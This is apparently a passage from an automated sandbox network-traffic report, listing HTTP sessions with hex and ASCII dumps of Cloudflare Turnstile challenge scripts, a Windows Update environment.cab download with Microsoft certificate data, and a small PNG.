                                                                                                                  2024-10-22 14:09:01 UTC1369INData Raw: 78 2d 66 6c 6f 77 3a 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 67 61 70 3a 30 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 30 3b 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 6c 6f 67 6f 7b
                                                                                                                  Data Ascii: x-flow:column nowrap;gap:0;height:140px;padding:12px 0;place-content:space-between}.size-compact .link-spacer{margin-left:3px;margin-right:3px}.size-compact .cb-c{margin:0 12px;text-align:left}.size-compact .cb-container{margin:0 12px}.size-compact #logo{
                                                                                                                  2024-10-22 14:09:01 UTC1369INData Raw: 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 2c 2e 72 74 6c 20 23 66 72 2d 6f 76 65 72 72 75 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 2c 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65 78 2d 73 74 61 72 74 3b 6a 75 73
                                                                                                                  Data Ascii: x}.rtl #fr-helper,.rtl #fr-overrun{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px}.rtl #branding,.rtl.size-compact #branding{padding-left:0;padding-right:0;text-align:left}.rtl.size-compact #branding{align-self:flex-start;jus
                                                                                                                  2024-10-22 14:09:01 UTC1369INData Raw: 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 2e 69 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 6e 73 70 75 6e 20 2e 63 69 72 63 6c 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 75 6e 73 70 69 6e 20 2e 37 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 33 70 78 3b 73 74 72 6f 6b 65
                                                                                                                  Data Ascii: 9;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#challenge-error-title .i-wrapper{display:none}.unspun .circle{animation:unspin .7s cubic-bezier(.65,0,.45,1) forwards}.circle{stroke-width:3px;stroke


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  58192.168.2.16497994.175.87.197443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-22 14:09:00 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=gMNfPcGdfAFaFbr&MD=Wr9+2x7V HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept: */*
                                                                                                                  User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                  Host: slscr.update.microsoft.com
                                                                                                                  2024-10-22 14:09:01 UTC560INHTTP/1.1 200 OK
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  Expires: -1
                                                                                                                  Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                  ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                                                                  MS-CorrelationId: 212f5fe9-efea-4d76-a99d-b4f9bd8193a4
                                                                                                                  MS-RequestId: b6ea92ec-025f-46fb-88aa-00a0c50b66a0
                                                                                                                  MS-CV: vMwKBM4lZ0+k4fhn.0
                                                                                                                  X-Microsoft-SLSClientCache: 1440
                                                                                                                  Content-Disposition: attachment; filename=environment.cab
                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                  Date: Tue, 22 Oct 2024 14:09:00 GMT
                                                                                                                  Connection: close
                                                                                                                  Content-Length: 30005
                                                                                                                  2024-10-22 14:09:01 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                                                                                  Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                                                                                  2024-10-22 14:09:01 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                                                                                  Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  59192.168.2.1649801104.18.95.414432276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-22 14:09:01 UTC730OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8d6a100ceca7e7db&lang=auto HTTP/1.1
                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/nu8l3/0x4AAAAAAAgk0nqtAQ4g0A4d/auto/fbE/normal/auto/
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-10-22 14:09:02 UTC331INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 22 Oct 2024 14:09:01 GMT
                                                                                                                  Content-Type: application/javascript; charset=UTF-8
                                                                                                                  Content-Length: 120323
                                                                                                                  Connection: close
                                                                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d6a1011ddd62d35-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  2024-10-22 14:09:02 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 62 61 58 49 73 34 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70
                                                                                                                  Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.baXIs4={"metadata":{"challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.supported_browsers":"http
                                                                                                                  2024-10-22 14:09:02 UTC1369INData Raw: 25 32 30 68 65 72 65 25 32 30 66 6f 72 25 32 30 6d 6f 72 65 25 32 30 69 6e 66 6f 72 6d 61 74 69 6f 6e 25 33 43 25 32 46 61 25 33 45 22 2c 22 74 65 73 74 69 6e 67 5f 6f 6e 6c 79 5f 61 6c 77 61 79 73 5f 70 61 73 73 22 3a 22 54 65 73 74 69 6e 67 25 32 30 6f 6e 6c 79 25 32 43 25 32 30 61 6c 77 61 79 73 25 32 30 70 61 73 73 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 61 69 6c 75 72 65 22 3a 22 45 72 72 6f 72 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 6f 6f 74 65 72 5f 74 65 72 6d 73 22 3a 22 54 65 72 6d 73 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 69 66 72 61 6d 65 5f 61 6c 74 22 3a 22 57 69 64 67 65 74 25 32 30 63 6f 6e 74 61 69 6e 69 6e 67 25 32 30 61 25 32 30 43 6c 6f 75 64 66 6c 61 72 65 25 32 30 73 65 63 75 72 69 74 79 25 32 30 63 68 61 6c 6c 65 6e 67 65 22
                                                                                                                  Data Ascii: %20here%20for%20more%20information%3C%2Fa%3E","testing_only_always_pass":"Testing%20only%2C%20always%20pass.","turnstile_failure":"Error","turnstile_footer_terms":"Terms","turnstile_iframe_alt":"Widget%20containing%20a%20Cloudflare%20security%20challenge"
                                                                                                                  2024-10-22 14:09:02 UTC1369INData Raw: 28 31 31 34 37 29 29 2f 36 29 2b 70 61 72 73 65 49 6e 74 28 67 4b 28 32 35 34 29 29 2f 37 2a 28 70 61 72 73 65 49 6e 74 28 67 4b 28 38 30 37 29 29 2f 38 29 2b 70 61 72 73 65 49 6e 74 28 67 4b 28 38 31 31 29 29 2f 39 2b 2d 70 61 72 73 65 49 6e 74 28 67 4b 28 31 33 30 31 29 29 2f 31 30 2c 66 3d 3d 3d 64 29 62 72 65 61 6b 3b 65 6c 73 65 20 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 63 61 74 63 68 28 67 29 7b 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 7d 28 61 2c 37 38 31 31 31 39 29 2c 65 4d 3d 74 68 69 73 7c 7c 73 65 6c 66 2c 65 4e 3d 65 4d 5b 67 4c 28 33 36 37 29 5d 2c 65 4f 3d 7b 7d 2c 65 4f 5b 67 4c 28 31 36 33 38 29 5d 3d 27 6f 27 2c 65 4f 5b 67 4c 28 31 31 32 36 29 5d 3d 27 73 27 2c 65 4f 5b 67 4c 28 31 31 35 33 29 5d 3d 27 75 27
                                                                                                                  Data Ascii: (1147))/6)+parseInt(gK(254))/7*(parseInt(gK(807))/8)+parseInt(gK(811))/9+-parseInt(gK(1301))/10,f===d)break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,781119),eM=this||self,eN=eM[gL(367)],eO={},eO[gL(1638)]='o',eO[gL(1126)]='s',eO[gL(1153)]='u'
                                                                                                                  2024-10-22 14:09:02 UTC1369INData Raw: 2c 44 29 2c 45 29 3a 46 7c 7c 6f 5b 67 50 28 31 33 36 33 29 5d 28 73 2c 6f 5b 67 50 28 36 34 32 29 5d 28 69 2c 44 29 2c 68 5b 44 5d 29 3b 65 6c 73 65 20 72 65 74 75 72 6e 20 48 3d 46 28 6f 5b 67 50 28 32 38 31 29 5d 29 2c 78 3d 42 5b 67 50 28 34 30 35 29 5d 28 67 50 28 31 31 31 33 29 29 2c 43 5b 67 50 28 31 31 37 33 29 5d 3d 67 50 28 37 36 32 29 2c 44 5b 67 50 28 38 31 37 29 5d 5b 67 50 28 38 39 39 29 5d 3d 67 50 28 31 33 33 33 29 2c 45 5b 67 50 28 37 36 31 29 5d 3d 67 50 28 31 32 30 35 29 2c 46 5b 67 50 28 31 33 34 39 29 5d 28 6f 5b 67 50 28 31 32 36 39 29 5d 2c 67 50 28 34 33 39 29 29 2c 49 3d 47 5b 67 50 28 34 30 35 29 5d 28 67 50 28 31 33 33 39 29 29 2c 49 5b 67 50 28 37 36 31 29 5d 3d 67 50 28 31 32 31 30 29 2c 4a 3d 48 5b 67 50 28 34 30 35 29 5d 28
                                                                                                                  Data Ascii: ,D),E):F||o[gP(1363)](s,o[gP(642)](i,D),h[D]);else return H=F(o[gP(281)]),x=B[gP(405)](gP(1113)),C[gP(1173)]=gP(762),D[gP(817)][gP(899)]=gP(1333),E[gP(761)]=gP(1205),F[gP(1349)](o[gP(1269)],gP(439)),I=G[gP(405)](gP(1339)),I[gP(761)]=gP(1210),J=H[gP(405)](
                                                                                                                  2024-10-22 14:09:02 UTC1369INData Raw: 63 74 69 6f 6e 28 6c 2c 6d 29 7b 72 65 74 75 72 6e 20 6c 2b 6d 7d 2c 27 71 4e 70 59 6f 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 72 65 74 75 72 6e 20 6c 28 6d 29 7d 2c 27 69 58 46 6d 71 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 72 65 74 75 72 6e 20 6c 25 6d 7d 2c 27 42 66 48 79 75 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 72 65 74 75 72 6e 20 6c 2d 6d 7d 2c 27 54 43 7a 76 5a 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 72 65 74 75 72 6e 20 6c 2d 6d 7d 7d 2c 6b 2c 68 3d 33 32 2c 6a 3d 66 5b 68 6a 28 38 36 35 29 5d 28 65 4d 5b 68 6a 28 31 37 30 38 29 5d 5b 68 6a 28 31 34 35 36 29 5d 2c 27 5f 27 29 2b 30 2c 6a 3d 6a 5b 68 6a 28 37 38 33 29 5d 28 2f 2e 2f 67 2c 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 2c 68 6b 29 7b 68 6b 3d 68 6a 2c 68 5e 3d
                                                                                                                  Data Ascii: ction(l,m){return l+m},'qNpYo':function(l,m){return l(m)},'iXFmq':function(l,m){return l%m},'BfHyu':function(l,m){return l-m},'TCzvZ':function(l,m){return l-m}},k,h=32,j=f[hj(865)](eM[hj(1708)][hj(1456)],'_')+0,j=j[hj(783)](/./g,function(l,m,hk){hk=hj,h^=
                                                                                                                  2024-10-22 14:09:02 UTC1369INData Raw: 63 65 6f 66 20 45 72 72 6f 72 3f 67 5b 68 6e 28 39 33 31 29 5d 3d 4a 53 4f 4e 5b 68 6e 28 38 33 38 29 5d 28 67 5b 68 6e 28 39 33 31 29 5d 2c 4f 62 6a 65 63 74 5b 68 6e 28 31 31 36 36 29 5d 28 67 5b 68 6e 28 39 33 31 29 5d 29 29 3a 67 5b 68 6e 28 39 33 31 29 5d 3d 4a 53 4f 4e 5b 68 6e 28 38 33 38 29 5d 28 67 5b 68 6e 28 39 33 31 29 5d 29 2c 6d 3d 69 7c 7c 68 6e 28 36 32 33 29 2c 6e 3d 65 4d 5b 68 6e 28 31 37 30 38 29 5d 5b 68 6e 28 31 30 33 38 29 5d 3f 6b 5b 68 6e 28 34 32 37 29 5d 28 27 68 2f 27 2b 65 4d 5b 68 6e 28 31 37 30 38 29 5d 5b 68 6e 28 31 30 33 38 29 5d 2c 27 2f 27 29 3a 27 27 2c 6f 3d 6b 5b 68 6e 28 31 36 39 31 29 5d 28 6b 5b 68 6e 28 31 36 39 31 29 5d 28 6b 5b 68 6e 28 31 35 37 31 29 5d 2b 6e 2b 6b 5b 68 6e 28 31 31 33 37 29 5d 2b 31 2b 68 6e
                                                                                                                  Data Ascii: ceof Error?g[hn(931)]=JSON[hn(838)](g[hn(931)],Object[hn(1166)](g[hn(931)])):g[hn(931)]=JSON[hn(838)](g[hn(931)]),m=i||hn(623),n=eM[hn(1708)][hn(1038)]?k[hn(427)]('h/'+eM[hn(1708)][hn(1038)],'/'):'',o=k[hn(1691)](k[hn(1691)](k[hn(1571)]+n+k[hn(1137)]+1+hn
                                                                                                                  2024-10-22 14:09:02 UTC1369INData Raw: 2d 31 2c 4e 5b 6f 5d 5b 68 6f 28 31 33 32 39 29 5d 28 4f 5b 50 5b 51 5d 5d 5b 73 5d 29 29 26 26 28 65 5b 68 6f 28 31 30 33 37 29 5d 28 52 2c 53 5b 54 5b 55 5d 5d 5b 73 5d 29 7c 7c 56 5b 6f 5d 5b 68 6f 28 34 38 39 29 5d 28 27 6f 2e 27 2b 57 5b 58 5b 59 5d 5d 5b 73 5d 29 29 2c 73 2b 2b 29 3b 7d 65 6c 73 65 20 5a 5b 6f 5d 3d 61 30 5b 61 31 5b 61 32 5d 5d 5b 68 6f 28 33 37 38 29 5d 28 66 75 6e 63 74 69 6f 6e 28 61 36 29 7b 72 65 74 75 72 6e 27 6f 2e 27 2b 61 36 7d 29 7d 65 6c 73 65 20 66 3d 4a 53 4f 4e 5b 68 6f 28 38 33 38 29 5d 28 64 29 3b 72 65 74 75 72 6e 20 6d 3d 7b 7d 2c 6d 5b 68 6f 28 31 34 34 32 29 5d 3d 66 2c 6d 5b 68 6f 28 31 34 33 36 29 5d 3d 67 2c 6d 5b 68 6f 28 31 32 35 38 29 5d 3d 68 2c 6d 5b 68 6f 28 36 37 32 29 5d 3d 69 2c 6d 5b 68 6f 28 39 33
                                                                                                                  Data Ascii: -1,N[o][ho(1329)](O[P[Q]][s]))&&(e[ho(1037)](R,S[T[U]][s])||V[o][ho(489)]('o.'+W[X[Y]][s])),s++);}else Z[o]=a0[a1[a2]][ho(378)](function(a6){return'o.'+a6})}else f=JSON[ho(838)](d);return m={},m[ho(1442)]=f,m[ho(1436)]=g,m[ho(1258)]=h,m[ho(672)]=i,m[ho(93
                                                                                                                  2024-10-22 14:09:02 UTC1369INData Raw: 5d 28 68 71 28 32 34 30 29 2c 69 5b 68 71 28 31 36 34 37 29 5d 29 29 7b 69 66 28 6f 3d 69 5b 68 71 28 32 35 33 29 5d 28 74 68 69 73 2e 68 5b 69 5b 68 71 28 31 30 31 32 29 5d 28 31 38 32 2c 74 68 69 73 2e 67 29 5d 5b 33 5d 5e 32 30 37 2b 74 68 69 73 2e 68 5b 69 5b 68 71 28 39 30 35 29 5d 28 31 38 32 2c 74 68 69 73 2e 67 29 5d 5b 31 5d 5b 68 71 28 31 36 35 31 29 5d 28 74 68 69 73 2e 68 5b 74 68 69 73 2e 67 5e 31 38 32 5d 5b 30 5d 2b 2b 29 26 32 35 35 2e 32 36 2c 39 35 29 2c 73 3d 69 5b 68 71 28 34 36 30 29 5d 28 65 2c 74 68 69 73 29 2c 76 3d 74 68 69 73 2e 68 5b 74 68 69 73 2e 67 5e 31 38 32 2e 35 31 5d 5b 34 5d 2c 6f 21 3d 3d 38 39 29 7b 69 66 28 69 5b 68 71 28 31 36 33 30 29 5d 28 31 32 39 2c 6f 29 29 6f 3d 69 5b 68 71 28 31 30 31 32 29 5d 28 74 68 69 73
                                                                                                                  Data Ascii: ](hq(240),i[hq(1647)])){if(o=i[hq(253)](this.h[i[hq(1012)](182,this.g)][3]^207+this.h[i[hq(905)](182,this.g)][1][hq(1651)](this.h[this.g^182][0]++)&255.26,95),s=i[hq(460)](e,this),v=this.h[this.g^182.51][4],o!==89){if(i[hq(1630)](129,o))o=i[hq(1012)](this
                                                                                                                  2024-10-22 14:09:02 UTC1369INData Raw: 3d 3d 69 6a 28 31 32 32 30 29 29 3f 66 49 3d 73 65 74 49 6e 74 65 72 76 61 6c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 67 62 28 29 7d 2c 31 65 33 29 3a 67 26 26 67 5b 69 6a 28 33 35 38 29 5d 3d 3d 3d 69 6a 28 31 34 31 31 29 26 26 66 5b 69 6a 28 34 31 38 29 5d 28 67 5b 69 6a 28 31 36 38 39 29 5d 2c 66 5b 69 6a 28 31 33 32 32 29 5d 29 26 26 28 66 5b 69 6a 28 34 31 38 29 5d 28 66 5b 69 6a 28 38 31 34 29 5d 2c 69 6a 28 32 37 35 29 29 3f 66 5b 66 5b 69 6a 28 31 35 37 37 29 5d 5d 26 26 28 69 3d 7b 7d 2c 69 5b 69 6a 28 33 35 38 29 5d 3d 69 6a 28 31 34 31 31 29 2c 69 5b 69 6a 28 31 36 37 39 29 5d 3d 6a 5b 69 6a 28 31 37 30 38 29 5d 5b 69 6a 28 31 30 30 37 29 5d 2c 69 5b 69 6a 28 31 36 38 39 29 5d 3d 69 6a 28 31 30 33 34 29 2c 69 5b 69 6a 28 31 35 37 32 29 5d 3d 66 5b
                                                                                                                  Data Ascii: ==ij(1220))?fI=setInterval(function(){gb()},1e3):g&&g[ij(358)]===ij(1411)&&f[ij(418)](g[ij(1689)],f[ij(1322)])&&(f[ij(418)](f[ij(814)],ij(275))?f[f[ij(1577)]]&&(i={},i[ij(358)]=ij(1411),i[ij(1679)]=j[ij(1708)][ij(1007)],i[ij(1689)]=ij(1034),i[ij(1572)]=f[
                                                                                                                  2024-10-22 14:09:02 UTC1369INData Raw: 65 74 75 72 6e 20 67 66 28 63 29 7d 63 61 74 63 68 28 68 29 7b 72 65 74 75 72 6e 20 65 5b 6a 63 28 34 31 35 29 5d 28 67 64 2c 65 5b 6a 63 28 34 31 35 29 5d 28 67 65 2c 63 29 29 7d 7d 2c 67 67 3d 66 75 6e 63 74 69 6f 6e 28 6a 65 2c 64 2c 65 2c 66 2c 67 29 7b 72 65 74 75 72 6e 20 6a 65 3d 67 4c 2c 64 3d 7b 27 70 56 67 6f 59 27 3a 66 75 6e 63 74 69 6f 6e 28 68 29 7b 72 65 74 75 72 6e 20 68 28 29 7d 2c 27 4f 51 57 65 4a 27 3a 6a 65 28 31 35 36 36 29 2c 27 4f 4f 4b 46 47 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 21 3d 3d 68 7d 2c 27 61 76 56 6c 6d 27 3a 6a 65 28 31 32 38 31 29 2c 27 5a 71 51 51 50 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 67 43 7a 50 6a 27 3a 6a 65 28 31 36 36 31 29
                                                                                                                  Data Ascii: eturn gf(c)}catch(h){return e[jc(415)](gd,e[jc(415)](ge,c))}},gg=function(je,d,e,f,g){return je=gL,d={'pVgoY':function(h){return h()},'OQWeJ':je(1566),'OOKFG':function(h,i){return i!==h},'avVlm':je(1281),'ZqQQP':function(h,i){return i==h},'gCzPj':je(1661)


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  60192.168.2.1649802104.18.95.414432276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-22 14:09:02 UTC742OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1
                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/nu8l3/0x4AAAAAAAgk0nqtAQ4g0A4d/auto/fbE/normal/auto/
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-10-22 14:09:02 UTC240INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 22 Oct 2024 14:09:02 GMT
                                                                                                                  Content-Type: image/png
                                                                                                                  Content-Length: 61
                                                                                                                  Connection: close
                                                                                                                  cache-control: max-age=2629800, public
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d6a1018ef22a912-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  2024-10-22 14:09:02 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                  Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  61192.168.2.1649804104.18.95.414432276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-22 14:09:03 UTC433OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8d6a100ceca7e7db&lang=auto HTTP/1.1
                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                  Connection: keep-alive
